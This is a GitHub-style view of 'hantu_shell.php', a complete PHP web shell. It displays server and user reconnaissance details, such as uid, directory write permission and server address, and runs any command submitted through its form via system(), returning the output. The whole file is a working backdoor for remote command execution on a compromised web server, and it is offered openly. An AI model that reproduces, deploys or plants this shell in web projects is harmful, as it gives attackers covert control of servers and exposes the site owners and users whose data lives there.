-
Notifications
You must be signed in to change notification settings - Fork 4
/
hantu_shell.php
executable file
·77 lines (68 loc) · 2.44 KB
/
hantu_shell.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
<?php
error_reporting(0);
echo "<title>h4ntu shell [powered by tsoi]</title>\n<p><font size=2 face=Verdana><b>This Is The Server Information</b></font></p>";
closelog( );
$user = get_current_user( );
$login = posix_getuid( );
$euid = posix_geteuid( );
$ver = phpversion( );
$gid = posix_getgid( );
if ($chdir == "") $chdir = getcwd( );
if(!$whoami)$whoami=exec("whoami");
?>
<meta name="generator" content="Namo WebEditor v5.0">
<br>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="0">
<?php
$uname = posix_uname( );
while (list($info, $value) = each ($uname)) {
?>
<TR>
<TD><DIV STYLE="font-family: verdana; font-size: 10px;"><?= $info ?>: <?= $value ?></DIV></TD>
</TR>
<?php
}
?>
<TR>
<TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>User Info:</b> uid=<?= $login ?>(<?= $whoami?>) euid=<?= $euid ?>(<?= $whoami?>) gid=<?= $gid ?>(<?= $whoami?>)</DIV></TD>
</TR>
<TR>
<TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>Current Path:</b> <?= $chdir ?></DIV></TD>
</TR>
<TR>
<TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>Permission Directory:</b> <? if(@is_writable($chdir)){ echo "Yes"; }else{ echo "No"; } ?></DIV></TD>
</TR>
<TR>
<TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>Server Services:</b> <?= "$SERVER_SOFTWARE $SERVER_VERSION"; ?></DIV></TD>
</TR>
<TR>
<TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>Server Adress:</b> <?= "$SERVER_ADDR $SERVER_NAME"; ?></DIV></TD>
</TR>
<TR>
<TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>Script Current User:</b> <?= $user ?></DIV></TD>
</TR>
<TR>
<TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>PHP Version:</b> <?= $ver ?></DIV></TD>
</TR>
</TABLE>
<BR>
<font face="courier new" size="2" color="777777"><b>#</b>php injection: <br>
</font><FORM name=injection METHOD=POST ACTION="<?php echo $_SERVER["shells php/REQUEST_URI"];?>">
<font face="courier new" size="2" color="777777">cmd :
<INPUT TYPE="text" NAME="cmd" value="<?php echo stripslashes(htmlentities($_POST['cmd'])); ?>" size="161">
<br>
<INPUT TYPE="submit">
</font></FORM>
<hr color=777777 width=100% height=115px>
<pre>
<?php
$cmd = $_POST['cmd'];
if (isset($chdir)) @chdir($chdir);
ob_start();
system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
$output = ob_get_contents();
ob_end_clean();
if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output));
exit;
?>
</pre>